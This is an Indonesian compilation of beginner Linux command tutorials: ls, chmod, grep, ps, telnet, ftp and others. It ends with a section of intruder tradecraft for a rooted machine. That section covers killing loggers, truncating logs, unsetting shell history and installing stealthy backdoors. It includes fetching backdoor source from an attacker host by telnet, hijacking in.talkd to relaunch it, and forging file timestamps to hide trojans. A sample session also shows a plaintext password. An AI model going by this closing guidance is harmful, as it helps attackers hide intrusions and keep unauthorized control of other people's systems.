Basic Command / Perintah Dasar dalam Linux Oleh ari_stress fajarpri@yahoo.

com

Berbekal dengan Howto yang kamu cetak, kamu telah berhasil menginstall Distro pertamamu dengan mulus. Jika kamu menginstall X-Windows, maka kamu akan memiliki pilihan-pilihan untuk mengklik icon-icon yang ada dan mencoba mengetahui apa fungsi dari icon-icon tersebut. Namun bagaimana jika kamu tidak menginstall X-Windows? Kamu akan dihadapkan dengan prompt untuk login. "Apa yang harus saya lakukan setelah login di Linux?" "Bagaimana untuk melihat isi harddisk di dalam Linux?" Pertanyaan-pertanyaan di atas adalah pertanyaan yang mungkin paling sering ditanyakan oleh para newbie setelah mereka berhasil menginstall Linux. Oleh karena itu, artikel ini bertujuan untuk membantu kamu untuk memulai petualangan Linuxmu yang pertama.

Perintah Linux beserta kegunaannya ---------------------------------cd x atau cd /x = masuk ke direktori x cd .. atau cd ../ atau cd/.. = pindah ke direktori satu level di bawah

x lalu [tab] [tab] = berguna untuk mengetahui perintah apa saja yang tersedia yang berawalan huruf x adduser = untuk menambahkan user baru ls atau dir = untuk melihat isi suatu direktori cat = untuk melihat isi dari suatu file text mv x y = untuk memindahkan atau merename file x ke file y cp x y = untuk mengkopi file x ke file y rm x = untuk menghapus file x mkdir x = untuk membuat direktori x rmdir x = untuk menghapus direktori x rm -r x = untuk menghapus direktori x beserta seluruh isinya rm p = untuk menghapus paket tertentu df atau df x = untuk mengetahui space kosong dalam device x

top = untuk mengetahui status memori (tekan q untuk quit) man x = untuk mengetahui keterangan manual dari suatu perintah less x = untuk melihat isi dari suatu file text echo x = untuk mencetak isi dari suatu file x ke screen mc = untuk menghidupkan Norton Commander dalam Linux (sangat berguna dan memudahkan bagi newbie) mount = untuk menghidupkan suatu device spt cdrom halt = untuk shutdown reboot atau [ctl + alt + del] = untuk reboot chmod = untuk mengubah permission suatu file ls -l x = untuk melihat isi suatu direktori secara rinci ln -s x y = untuk membuat link dari suatu file x ke file y find x -name y -print = untuk menemukan file y, dengan mencari mulai dari direktori x dan tampilkan hasilnya pada layar ps = untuk melihat seluruh proses yang sedang berjalan kill x = untuk mematikan proses x (x adalah PID di dalam ps) [alt] + F1 - F7 = untuk berpindah dari terminal 1 - 7 (ciri khas Linux) lilo = untuk membuat boot disk startx = untuk menjalankan X-Windows [ctl] + [alt] + [backspace] = untuk keluar dari X-Windows jika terjadi trouble [ctl] + [alt] + F1 - F6 = untuk pindah dari satu terminal ke terminal lain dalam X-Windows xf86Config = untuk mengeset X (primitif) dalam text mode Xconfigurator = sama seperti di atas

Perintah Dasar Linux Untuk Pemula by : scut

Seperti halnya bila kita mengetikkan perintah di DOS, command line atau baris perintah Linux juga diketikkan di prompt dan diakhiri enter untuk mengeksekusi perintah tersebut. Baris perintah merupakan cara yang lebih efisien untuk melakukan sesuatu pekerjaan oleh karena itu pemakai Linux tetap mengandalkan cara ini untuk bekerja. Sebaiknya pemula juga harus mengetahui dan sedikitnya pernah menggunanakan perintah baris ini karena suatu saat pengetahuan akan perintah-perintah ini bisa sangat diperlukan. Saya mengumpulkan beberapa perintah dasar yang mungkin kelak akan sering digunakan terutama oleh para pemula. Perhatian: pengetahuan akan perintah-perintah yang lain akan segera bertambah seiring dengan kemajuan Anda menguasai sistem operasi Linux ini. Penjelasan masing-masing perintah akan dipersingkat saja dan untuk mengetahui lebih detail lagi fungsi-fungsi suatu perintah, Anda dapat melihat manualnya, misalnya dengan mengetikkan perintah man: $ man ls = Manual tersebut akan menampilkan bagaimana cara penggunaan perintah ls itu secara lengkap. -- Perintah & Perintah & dipakai dibelakang perintah lain dan menjalankannya di background. Tujuannya adalah untuk membebaskan shell agar bisa dipergunakan menjalankan prosesproses yang lain. Lihat juga perintah bg dan fg.

-- Perintah adduser Biasanya hanya dilakukan oleh root untuk menambahkan user atau account yg baru. Setelah perintah ini bisa dilanjutkan dengan perintah passwd, yaitu perintah untuk membuat password bagi user tersebut. # adduser scut # passwd scut Selanjutnya Anda akan diminta memasukkan password untuk user udin. Isikan password untuk udin dua kali dengan kata yang sama.

-- Perintah alias Digunakan untuk memberi nama lain dari sebuah perintah. Misalnya bila Anda ingin perintah ls dapat juga dijalankandengan mengetikkan perintah dir, maka buatlah aliasnya sbb: $ alias dir=ls Untuk melihat perintah-perintah apa saja yang mempunyai nama lain saat itu, cukup ketikkan alias. Lihat juga perintah unalias.

-- Perintah bg Untuk memaksa sebuah proses yang dihentikan sementara(suspend) agar berjalan di background. Misalnya Anda sedang menjalankan sebuah perintah di foreground (tanpa diakhiri perintah &) dan suatu saat Anda membutuhkan shell tersebut maka Anda dapat memberhentikan sementara perintah tersebut dengan Ctrl-Z kemudian ketikan perintah bg untuk menjalakannya di background. Dengan cara ini Anda telah membebaskanshell tapi tetap mempertahankan perintah lama berjalan di background. Lihat juga perintah fg.

-- Perintah cat Menampilkan isi dari sebuah file di layar. $ cat namafile

-- Perintah cd Change Directory atau untuk berpindah direktori dan saya kira Anda tidak akan menemui kesulitan menggunakan perintah ini karena cara penggunaanya mirip dengan perintah cd di DOS.

-- Perintah chgrp Perintah ini digunakan untuk merubah kepemilikan kelompok file atau direktori. Misalnya untuk memberi ijin pada kelompok atau grup agar dapat mengakses suatu file. Sintaks penulisannya adalah sbb: # chgrp <grup baru> <file>

-- Perintah chmod Digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori. Anda dapat menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permission/perijinan yang dapat dirubah yaitu r untuk read, w untuk write dan x untuk execute. Dengan menggunakan letter coding, Anda dapat merubah permission diatas untuk masing-masing u (user), g (group), o (other) dan a (all) dengan hanya memberi tanda plus (+) untuk menambah ijin dan tanda minus (-) untuk mencabut ijin.

Misalnya untuk memberikan ijin baca dan eksekusi file coba1 kepada owner dan group, perintahnya adalah: $ chmod ug+rx coba1

Untuk mencabut ijin-ijin tersebut: $ chmod ug-rx coba1

Dengan menggunakan sitem numeric coding, permission untukuser, group dan other ditentukan dengan menggunakan kombinasi angka-angka, 4, 2 dan 1 dimana 4 (read), 2 (write) dan 1 (execute).

Misalnya untuk memberikan ijin baca(4), tulis(2) dan eksekusi(1) file coba2 kepada owner, perintahnya adalah: $ chmod 700 coba2 Contoh lain, untuk memberi ijin baca(4) dan tulis(2) file coba3 kepada user, baca(4) saja kepada group dan other, perintahnya adalah:

$ chmod 644 coba3

-- Perintah chown Merubah user ID (owner) sebuah file atau direktori $ chown <user id> <file>

-- Perintah cp Untuk menyalin file atau copy. Misalnya untuk menyalin file1 menjadi file2: $ cp <file1> <file2>

-- Perintah fg Mengembalikan suatu proses yang dihentikan sementar(suspend) agar berjalan kembali di foreground. Lihat juga perintah bg diatas.

-- Perintah find Untuk menemukan dimana letak sebuah file. Perintah ini akan mencari file sesuai dengan kriteria yang Anda tentukan. Sintaksnya adalah perintah itu sendiri diikuti dengan nama direktori awal pencarian, kemudian nama file (bisa menggunakan wildcard, metacharacters) dan terakhir menentukan bagaimana hasil pencarian itu akan ditampilkan. Misalnya akan dicari semua file yang berakhiran .doc di current direktori serta tampilkan hasilnya di layar:

$ find . -name *.doc -print . /public/docs/account.doc . /public/docs/balance.doc . /public/docs/statistik/prospek.doc ./public/docs/statistik/presconf.doc

-- Perintah grep Global regular expresion parse atau grep adalah perintah untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan. $ grep <teks> <file> Misalnya akan dicari file-file yang mengandung teks marginal di current direktori: $ grep marginal <file>

diferent.doc: Catatan: perkataan marginal luas dipergunakan di dalam ilmu ekonomi prob.rtf: oleh fungsi hasil marginal dan fungsi biaya marginal jika fungsi prob.rtf: jika biaya marginal dan hasil marginal diketahui maka biaya total

-- Perintah gzip Ini adalah software kompresi zip versi GNU, fungsinya untuk mengkompresi sebuah file. Sintaksnya sangat sederhana:

$ gzip <namafile>

Walaupun demikian Anda bisa memberikan parameter tertentu bila memerlukan kompresi file yang lebih baik, silakan melihat manual page-nya. Lihat juga file tar, unzip dan zip.

-- Perintah halt Perintah ini hanya bisa dijalankan oleh super user atau Anda harus login sebagai root. Perintah ini untuk memberitahu kernel supaya mematikan sistem atau shutdown.

-- Perintah hostname Untuk menampilkan host atau domain name sistem dan bisa pula digunakan untuk mengesset nama host sistem. [flory@localhost docs] $ hostname localhost.localdomain

-- Perintah kill Perintah ini akan mengirimkan sinyal ke sebuah proses yang kita tentukan. Tujuannya adalah menghentikan proses. $ kill <sinyal> <pid> PID adalah nomor proses yang akan di hentikan.

- Perintah less

Perintah ini sama fungsinya dengan perintah more (melihat isi dari sebuah file) dan hampir sama juga dengan perintah cat.

-- Perintah login Untuk masuk ke sistem dengan memasukkan login ID atau dapat juga digunakan untuk berpindah dari user satu ke user lainnya.

-- Perintah logout Perintah yang digunakan apabila kita mau keluar dari sistem

-- Perintah ls Menampilkan isi dari sebuah direktori seperti perintah dir di DOS. Anda dapat menggunakan beberapa option yang disediakan untuk mengatur tampilannya di layar. Bila Anda menjalankan perintah ini tanpa option maka akan ditampilkan seluruh file nonhidden(file tanpa awalan tanda titik) secara alfabet dan secara melebar mengisi kolom layar. Option -la artinya menampilkan seluruh file/all termasuk file hidden(file dengan awalan tanda titik) dengan format panjang.

$ ls $ ls -al $ ls -a1

-- Perintah man

Untuk menampilkan manual page atau teks yang menjelaskan secara detail bagaimana cara penggunaan sebuah perintah. Perintah ini berguna sekali bila sewaktu-waktu Anda lupa atau tidak mengetahui fungsi dan cara menggunakan sebuah perintah. $ man <perintah>

-- Perintah mesg Perintah ini digunakan oleh user untuk memberikan ijin user lain menampilkan pesan dilayar terminal. Misalnya mesg Anda dalam posisi y maka user lain

bisa menampilkan pesan di layar Anda dengan write atau talk. $ mesg y atau mesg n Gunakan mesg n bila Anda tidak ingin diganggu dengan tampilan pesan-pesan dari user lain.

-- Perintah mkdir Membuat direktori baru, sama dengan perintah md di DOS. $ mkdir <nama direktori>

-- Perintah more Mempaging halaman, seperti halnya less.

-- Perintah mount Perintah ini akan me-mount filesystem ke suatu direktori atau mount-point yang telah ditentukan. Hanya superuser yang bisa menjalankan perintah ini. Untuk melihat filesystem apa saja beserta mount-pointnya saat itu, ketikkan perintah mount. Perintah ini dapat Anda pelajari di bab mengenai filesystem. Lihat juga perintah umount. $ mount /dev/hda3 on / type ext2 (rw) none on /proc type proc (rw) /dev/hda1 on /dos type vfat (rw) /dev/hda4 on /usr type ext2 (rw) none on /dev/pts type devpts (rw,mode=0622)

-- Perintah mv Untuk memindahkan file dari satu lokasi ke lokasi yang lain. Bila argumen yang kedua berupa sebuah direktori maka mv akan memindahkan file ke direktori tersebut. Bila kedua argumen berupa file maka nama file pertama akan menimpa file kedua. Akan terjadi kesalahan bila Anda memasukkan lebih dari dua argumen kecuali argumen terakhir berupa sebuah direktori. $ mv psybnc /var/tmp $ mv psybnc <nama baru>

-- Perintah passwd Digunakan untuk mengganti password. Anda akan selalu diminta mengisikan password lama dan selanjutnya akan diminta mengisikan password baru sebanyak dua kali. Password sedikitnya terdiri dari enam karakter dan sedikitnya mengandung sebuah karakter. $ passwd

-- Perintah pwd Menampilkan nama direktori dimana Anda saat itu sedang berada.

-- Perintah rm Untuk menghapus file dan secara default rm tidak menghapus direktori. Gunakan secara hati-hati perintah ini terutama dengan option -r yang secara rekursif dapat mengapus seluruh file. $ rm -rf <nama file> $ rm -f $ rm

-- Perintah rmdir Untuk menghapus direktori kosong. $ rmdir <nama direktori>

-- Perintah shutdown Perintah ini untuk mematikan sistem, seperti perintah halt. Pada beberapa sistem anda bisa menghentikan komputer dengan perintah shutdown -h now dan merestart sistem dengan perintah shutdown -r now atau dengan kombinasi tombol Ctr-Alt-Del. # shutdown -r now

-- Perintah su Untuk login sementara sebagai user lain. Bila user ID tidak disertakan maka komputer menganggap Anda ingin login sementara sebagai super user atau root. Bila Anda bukan root dan user lain itu memiliki password maka

Anda harus memasukkan passwordnya dengan benar. Tapi bila Anda adalah root maka Anda dapat login sebagai user lain tanpa perlu mengetahui password user tersebut.

-- Perintah tail Menampilkan 10 baris terakhir dari suatu file. Default baris yang ditampilkan adalah 10 tapi Anda bisa menentukan sendiri berapa baris yang ingin ditampilkan: $ tail <jumlah baris> <file file ....>

-- Perintah talk Untuk mengadakan percakapan melalui terminal. Input dari terminal Anda akan disalin di terminal user lain, begitu sebaliknya.

-- Perintah tar Menyimpan dan mengekstrak file dari media seperti tape drive atau hard disk. File arsip tersebut sering disebut sebagai file tar. Sintaknya sebagai berikut:$ tar <aksi> <option> <file atau direktori>

-- Perintah umount Adalah kebalikan dari perintah mount, yaitu untuk meng-unmount filesystem dari mount-pointnya. Setelah perintah ini dijalankan direktori yang menjadi mount-point tidak lagi bisa digunakan.

# umount <filesystem>

-- Perintah unalias Kebalikan dari perintah alias, perintah ini akan membatalkan sebuah alias. Jadi untuk membatalkan alias dir seperti telah dicontohkan diatas, gunakan perintah: $ unalias dir

-- Perintah unzip Digunakan untuk mengekstrak atau menguraikan file yang dikompres dengan zip. Sintaknya sederhana dan akan mengekstrak file yang anda tentukan: $ unzip <nama file> Lihat juga perintah-perintah gzip dan unzip.

-- Perintah wall Mengirimkan pesan dan menampilkannya di terminal tiap user yang sedang login. Perintah ini berguna bagi superuser atau root untuk memberikan peringatan ke seluruh user, misalnya pemberitahuan bahwa server sesaat lagi akan dimatikan. # who Dear, everyone..... segera simpan pekerjaan kalian, server akan saya matikan 10 menit lagi.

-- Perintah who Untuk menampilkan siapa saja yang sedang login. Perintah ini akan menampilkan informasi mengenai login name, jenis terminal, waktu login dan remote hostname untuk setiap user yang saat itu sedang login. Misalnya: $ who

-- Perintah xhost + Perintah ini digunakan untuk memberi akses atau menghapus akses(xhost -) host atau user ke sebuah server X.

-- Perintah xset Perintah ini untuk mengeset beberapa option di X Window seperti bunyi bel, kecepatan mouse, font, parameter screen saver dan sebagainya. Misalnya bunyi bel dan kecepatan mouse dapat Anda set menggunakan perintah ini: $ xset b <volume> <frekuensi> <durasi dalam milidetik> $ xset m <akselerasi> <threshold>

-- Perintah zip Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip.

Dasar-dasar Perintah Unix 28 Mei 2002

Tentu Rekan - Rekan Sekalian ingin Mengatahui sebagian Perintah Unix? pada berbagai Clone Unix (BSD,Linux,Sunos,System V,SCO,IRIX,AIX) hampir mempunyai persamaan satu sama lain nya. Sebagai Contoh saya berikan Cara menjalankan perintah Linux ini sebagian saya ambil dari tutorial Kecoak Elektronik dan Perintah Jitu dari HAcker Israel yaitu Mixter :: Tutorial CyberBug Perintah-perintah Unix Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf kecil,dan Linux/UNIX membedakan huruf besar dan kecil.

------> ls Ingat perintah DIR di DOS? ... nah perintah ini sama dgn DIR, gunanya untuk menampilkan 'list' file di dalam directory. Perintah ls juga dilengkapi dengan flag tambahan yang bisa di lihat dengan mengetik : ls --help???? ; menampilkan bantuan man ls??????? ; man bisa juga diartikan manual, jadi manual ls Beberapa perintah ls yang umum adalah : ls -l ; menampilkan informasi tambahan (l = long) ls -a ; menampilkan hidden file (a = attribute) ls -la Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki 'owns', file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain, contoh : rwxr-x--x Catatan : karakter 1-3: user/owner permissions karakter 4-6: group permissions karakter 7-8: other permissions This is what the letters mean: r - read, permissions utk 'baca' w - write, permission utk 'tulis' x - (e)xecute, permission utk 'menjalankan'

Jadi pada contoh diatas : user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn user/owner dpt read/baca, execute/jalankan file user lain dapat execute/menjalankan file tsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah directory ------> cat Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : "cat <namafile>" Untuk membuat file ketik : "cat > <namafile>" ketik isi file dan utk menyimpan tekan CTRL + C atau CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data ditambahkan kefile yang sudah ada ganti > dengan >> ------> more Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt ------> grep Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt ------> man UNIX help/manual, ketik : man <namaprogram> untuk eksekusi. man pwd ------> echo echo dipakai utk menampilkan apa yang kita ketik di layar, seperti : echo "saya belajar linux" saya belajar linux atau untuk membuat file, seperti : echo "biff n" > .profile yang akan membuat file .profile di directory aktif yg berisi teks "biff n" atau menambah file isi file dgn mengganti > dengan >> ------> cp copy, dipakai untuk mengcopy file. cp jilid1.txt jilid1.txt.backup cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup ------> mv move, mengganti nama file atau directory

mv jilid1.txt jilid1a.txt mv backup bak ------> rm remove, hapus file rm jilid1.txt ; hapus file jilid1.txt rm * ; hapus semua file di directory aktif (hati-hati!) ------> cd change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS cd /root perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash) ------> mkdir make directory, membuat directory mkdir backup ------> rmdir remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum menghapus directory. rmdir backup ------> who who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai berikut : cyberservices:~$ who root tty1 Dec 20 17:47 cyberbug tty2 Dec 20 17:48 cyberbug tty3 Dec 20 17:48 cyberbug ttyp0 Dec 20 18:43 (localhost) Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main langsung dari console. ------> whoami Kalo lupa diri :) ini perintahnya : Siapakah Aku? cyberservices:~$ whoami cyberbug ------> who am i

Ini juga kalo sudah lupa daratan :)) cyberservices:~$ who am i cyberservices!cyberbug tty3 Dec 20 17:48 ------> pwd Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat jalan2, sudah gak tau mo pulang lewat mana :) cyberservices:~$ pwd /home/cyberbug ------> ps Menampilkan proses yang aktif cyberservices:~$ ps PID TTY STAT TIME COMMAND 87 2 S 0:00 -bash 88 3 S 0:00 -bash 1440 2 S 0:00 pico jilid2.txt 1443 3 R 0:00 ps ------> ping Mengecek host apakah 'up' utk istilah teknisnya silakan 'man ping' cyberservices:~$ ping localhost PING localhost (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms --- localhost ping statistics --5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.1/0.2 ms cyberservices:~$ ping 127.0.0.1 PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms --- 127.0.0.1 ping statistics --5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.1/0.2 ms cyberservices:~$ Perhatikan bahwa localhost dan 127.0.0.1 adalah sama :) 127.0.0.1 adalah local loopback yang disediakan untuk testing. ------> finger Mencari informasi user cyberservices:~$ finger Login Name Tty Idle Login Time Office Office Phone cyberbug CyberBug 2 Dec 22 01:10 cyberbug CyberBug 3 Dec 22 01:10 root 1 1:37 Dec 22 01:10 cyberservices:~$ finger @cyberservices.com [cyberservices.com] Welcome to Linux version 2.0.34 at cyberservices.com ! 3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00 Login Name Tty Idle Login Time Office Office Phone cyberbug CyberBug 2 Dec 22 01:10 cyberbug CyberBug 3 Dec 22 01:10 root 1 1:39 Dec 22 01:10 cyberservices:~$ finger @localhost [localhost] Welcome to Linux version 2.0.34 at cyberservices.com ! 3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00 Login Name Tty Idle Login Time Office Office Phone cyberbug CyberBug 2 Dec 22 01:10 cyberbug CyberBug 3 Dec 22 01:10 root 1 1:40 Dec 22 01:10 cyberservices:~$ finger cyberbug Login: cyberbug Name: CyberBug Directory: /home/cyberbug Shell: /bin/bash On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle

On since Tue Dec 22 01:10 (PHT) on tty3 Last login Tue Dec 22 01:13 (PHT) on tty4 Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75 #cyberbug" No mail. No Plan. cyberservices:~$ finger root Login: root Name: Directory: /root Shell: /bin/bash On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle Mail last read Tue Dec 15 09:19 1998 (PHT) No Plan. ------> telnet Melakukan komunikasi dengan host lain melalui telnet protocol cyberservices:~$ telnet localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Welcome to Linux 2.0.34. cyberservices login: cyberbug Password: 3m4nggu3p1k1r1n Linux 2.0.34. Last login: Tue Dec 22 01:13:52 on tty4. No mail. cyberservices:~$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998 03:52:51 +0800 helo darling 250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to meet you mail from: guest@cyberservices.com

250 guest@cyberservices.com... Sender ok rcpt to: untukmu@seorang.jauh.disana 250 untukmu@seorang.jauh.disana... Recipient ok (will queue) data 354 Enter mail, end with "." on a line by itself Kukirim lagu dan salam rinduku . 250 EAA01615 Message accepted for delivery quit cyberservices:~$ telnet localhost 110 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. +OK cyberservices POP3 Server (Version 1.005l) ready at <Tue Dec 22 03:53:35 1998> user root +OK please send PASS command pass 3m4nggu3p1k1r1n +OK 2 messages ready for root in /usr/spool/mail/root stat +OK 2 7227 retr 1 quit ------> ftp Menggunakan file tranfer program cyberservices:~$ ftp localhost Connected to localhost. 220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready. Name (localhost:cyberbug): ftp 331 Guest login ok, send your complete e-mail address as password. Password: cyberbug@k-elektronik.org 230-Welcome, archive user! ... blah blah ... blah

230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ftp juga bisa dilakukan dengan melakukan telnet ke port 21 cyberservices:~$ telnet localhost 21 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready. ------> talk Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb: talk root atau talk root@cyberservices.com [Waiting for your party to respond] [Ringing your party again] Di terminal root akan muncul pesan : Message from Talk_Daemon@cyberservices at 4:00 ... talk: connection requested by cyberbug@localhost. talk: respond with: talk cyberbug@localhost root harus mengetik talk cyberbug@localhost jika ingin menjawab request talk cyberbug@localhost [Connection established] Perintah Tambahan dari Saya ( r3v0lt aka Intruded) 1. Perintah Untuk Kompilasi File ex. #gcc -o namafile filekompilasi #gcc -o pscan pscan.c 2. Perintah Running file eksekusi ex. #./file #./pscan #./scaner.pl #./scanner.sh

3. Perintah Hentikan proses ex.# Ctrl+c 4. Perintah Proses sementara ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD) 5. Perintah ganti Shell (pada FreeBSD) ex.#chsh ---> ksh,bash,tcsh 6. Perintah Ganti Passwd ex.#passwd 7. Perintah melihat ip suatu host ex.#dig ip ex.#nslookup ip 8. Perintah editor ex.#pico wepedodol.c 9. perintah pipa, dua proses sekaligus ex.# ls -al |head file akan menanmpilakn direktori bagian atas nya saja 10.perintah ganti mode ex.#chmod +x file :: Begitu aja dolo yaaa ok say..... ::: Keterangan Lae Kita Mixter = Here are my suggestions... 1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :). 2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed. * Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).

* Look if the system is already backdoored!! you might want to remove other backdoors. * Look for a loghost or snmp (dangerous because you cant manipulate the logs on a faraway loghost). Watch out for *logd, sniffers, netmon's etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc). 3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing: (on your box) $ uuencode -m backdoor.c backdoor.c | less <uu encoded junk appears, which you copy with your mouse> (on the target box) uudecode <it waits for input, paste the uuencoded stuff, page-by-page> # cc -o backdoor backdoor.c A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method. 4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is

installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. :P To modify timestamps, you do a simple: touch -r /bin/bash /path/to/your/trojan this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP's central mail exchange server... About your backdoor: Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more. For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5]. -----------------------------------------------------------------------------------------..::: JasaKom :::.. ??????????? r3v0lt aka Intruded <intruded@linuxmail.org> * http://private.localbox.net (staff only - no link)

* http://published.localbox.net (free exploits - k00lz * http://restriction.localbox.net (staff only - no link) Credit Mixter & CyberBug (was confirmation Sept 2001) File = Public ! or MaYBe go to: http://published.localbox.net ------------------------------------------------------------/* Dipersilahkan untuk mengkopi paste dan menyebarluaskan secara tak terbatas artikel ini asal dengan tujuan pendidikan dan menyertakan credit atas r3v0lt aka Intruded. Penulis dan editor tidak bertanggung jawab atas penyalahgunaan versi pendidikan artikel ini. */ Penulis : r3v0lt sumber Jasakom